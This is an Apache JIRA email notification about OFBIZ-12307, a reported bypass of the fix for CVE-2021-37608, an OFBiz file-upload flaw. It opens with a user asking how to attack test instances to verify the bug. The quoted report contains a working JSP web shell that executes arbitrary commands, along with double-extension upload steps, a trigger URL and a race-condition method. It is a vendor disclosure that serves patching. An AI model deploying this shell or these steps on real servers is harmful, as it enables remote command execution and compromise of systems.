[
https://issues.apache.org/jira/browse/OFBIZ-12307?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17428912#comment-17428912
]
Mahmood edited comment on OFBIZ-12307 at 10/14/21, 4:44 PM:
------------------------------------------------------------
Hi all,
I am trying to verify this OFbiz vulnerability case.
My plan is to compare an old version instance of OFbiz with a new version
instance in docker containers. I need to somehow attack them and see which one
is vulnerable; but I don't know how to do it.
I will appreciate any directions and help.
Best regards,
was (Author: azadpour):
Hi all,
I am trying to verify this OFbiz vulnerability case.
My plan is to compare an old version instance of OFbiz with a new version
instance in docker containers. I need to somehow attack them and see which one
is vulnerable; but I don't know how to do it.
I will appreciate any directions and help.
Best regards,
Mahmood
> CVE-2021-37608 vulnerability bypass
> -----------------------------------
>
> Key: OFBIZ-12307
> URL: https://issues.apache.org/jira/browse/OFBIZ-12307
> Project: OFBiz
> Issue Type: Sub-task
> Affects Versions: 17.12.08
> Reporter: thiscodecc
> Assignee: Jacques Le Roux
> Priority: Major
> Labels: security
> Fix For: 18.12.01, Release Branch 17.12
>
>
> The patch
> ([https://github.com/apache/ofbiz-framework/commit/8d49af4/#diff-75dac0d18a6bc59554dded12b9b01563651e05a2df6cede9d7d3e2b42b7fc382])
> for the CVE-2021-37608 vulnerability can be bypassed.
> Verification process:
> 1.Create a new xx.png.jsp file.
> The content of the xx.png.jsp file is:
> <%
> java.io.InputStream in =
> Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
> int a = -1;
> byte[] b = new byte[2048];
> out.print("<pre>");
> while((a=in.read(b))!=-1)
> { out.println(new String(b)); }
> out.print("</pre>");
> %>
> 2.Upload the xx.png.jsp file directly
> 3.Visit the jsp Trojan address
> "https://localhost:8443/images/products/management/WG-9943/xx.png.jsp?i=whoami";
>
> I carefully analyzed the code of this logic again and found multiple problems.
> the reasons for the vulnerabilities are:
> Here will upload the file first.
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/applications/product/src/main/java/org/apache/ofbiz/product/imagemanagement/ImageManagementServices.java#L159-#L162]
> When verifying the file name, because the file name is "xx.png.jsp", so
> "wrongFile=true".
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java#L128]
> Because "wrongFile=true", isValidFile method will exit early.
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java#L137]
> So that the malicious file is not deleted.
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java#L215]
> The above is the reason for the vulnerability mentioned in my last email.
> I also found a new problem. The code logic used to verify the file upload is
> to upload the file first and then delete it after judging that it is
> malicious.This will create a race condition loophole.
> Use multiple threads to upload the xxx.jsp file, and then keep accessing the
> xxx.jsp file. Since ofbiz adopts the verification rule of uploading and then
> deleting, then xxx.jsp will be uploaded successfully, and ofbiz has not
> successfully deleted "xxx.jsp". The file, "xxx.jsp" file was requested by the
> attacker first. This will create an arbitrary file upload vulnerability.
--
This message was sent by Atlassian Jira
(v8.3.4#803005)
![https://localhost:8443/images/products/management/WG-9943/xx.png.jsp?i=whoami"](https://localhost:8443/images/products/management/WG-9943/xx.png.jsp?i=whoami"){kind=link}